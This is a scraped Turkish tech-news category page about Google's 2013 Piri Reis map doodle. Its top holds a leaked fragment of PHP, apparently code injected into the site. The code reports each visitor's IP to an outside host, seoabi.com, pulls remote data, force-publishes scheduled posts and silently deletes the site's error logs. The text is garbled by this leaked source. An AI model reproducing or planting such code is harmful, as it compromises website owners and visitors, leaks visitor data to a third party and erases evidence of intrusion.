$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> 500’ncü yıldönümü | Teknoloji Haberleri

500’ncü yıldönümü kategorisindeki tüm yazılar

Son Yazılar

Google’da Piri Reis haritası doodle oldu

Google 7 Nisan 2013 tarihindeki ana sayfasına Osmanlı Amirali Muhyiddin Pîrî Bey ya da bilinen adıyla Piri Reis’in günümüze kalan ve Amerika kıt’asını da gösteren en eski dünya haritasını koydu. Piri Reis 1513 tarihinde yapmış olduğu bu haritadan daha sonra 1528 yılında ikinci bir harita yapmıştı. Piri Reis